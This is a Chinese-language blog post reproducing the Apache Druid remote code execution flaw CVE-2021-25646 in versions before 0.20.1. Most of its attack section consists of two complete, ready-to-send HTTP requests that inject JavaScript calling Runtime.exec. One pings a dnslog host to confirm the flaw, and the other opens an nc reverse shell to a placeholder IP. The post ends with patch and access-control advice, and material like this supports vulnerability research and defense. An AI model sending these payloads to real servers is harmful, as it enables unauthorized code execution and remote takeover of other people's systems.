【漏洞复现】Apache Druid 远程代码执行 CVE-2021-25646

0x00 前言

这个漏洞的根本问题是一个druid中全局性的问题，开发者在使用Jackson相关的标签时，出现疏漏，使得攻击者可以构造传入的json串来控制一些敏感的参数。

阿里云安全@Litch1向Apache官方报告了Apache Druid远程代码执行漏洞

当时 漏洞 已知，处于某些原因，提取的poc也没进行公布，今天醒来，看到很多公众号发 ，也就总结一下，集各家所长，写一个复现的文章。

Apache Druid 是用Java编写的面向列的开源分布式数据存储，旨在快速获取大量事件数据，并在数据之上提供低延迟查询。
Apache Druid 默认情况下缺乏授权认证，攻击者可以发送特制请求，利用Druid服务器上进程的特权执行任意代码。
Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中，默认已被禁用。但是，在Druid 0.20.0及更低版本中，经过身份验证的用户发送恶意请求，利用Apache Druid漏洞可以执行任意代码。

0x01 影响版本

Apache Druid < 0.20.1

0x02 环境搭建

这里不多写了，看了下 peiqi 写的，就直接沾过来，然后拿实战去复现就好了

Docker下载链接: https://github.com/apache/druid/archive/druid-0.20.0.zip

下载之后进入目录 distributiondocker

执行命令编译 docker-compose up -d

、

0x03 漏洞复现

1、POC：(POC主要是借助dnslog进行测试：ping xxxxx.dnslog.cn)

POST /druid/indexer/v1/sampler HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 995
Connection: close


{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{"isRobot":true,"channel":"#x","timestamp":"2021-2-1T14:12:24.050Z","flags":"x","isUnpatrolled":false,"page":"1","diffUrl":"https://xxx.com","added":1,"comment":"Botskapande Indonesien omdirigering","commentLength":35,"isNew":true,"isMinor":false,"delta":31,"isAnonymous":true,"user":"Lsjbot","deltaBucket":0,"deleted":0,"namespace":"Main"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('ping xxxxx.dnslog.cn')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

2、反弹shell：（采用nc反弹）

POST /druid/indexer/v1/sampler HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1008
Connection: close


{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{"isRobot":true,"channel":"#x","timestamp":"2021-2-1T14:12:24.050Z","flags":"x","isUnpatrolled":false,"page":"1","diffUrl":"https://xxx.com","added":1,"comment":"Botskapande Indonesien omdirigering","commentLength":35,"isNew":true,"isMinor":false,"delta":31,"isAnonymous":true,"user":"Lsjbot","deltaBucket":0,"deleted":0,"namespace":"Main"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec(' nc xxx.xxx.xxx.xxx 9999 -e /bin/sh')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

这边我没有做反弹的实验，就用的peiqi的图

0x04 修复建议

1. 升级Apache Druid 到最新的0.20.1版本 https://github.com/apache/druid/releases/tag/druid-0.20.1
2. 对Apache Druid进行权限控制，只允许受信任的主机访问集群服务器

转载请注明：Adminxe's Blog » 【漏洞复现】Apache Druid 远程代码执行 CVE-2021-25646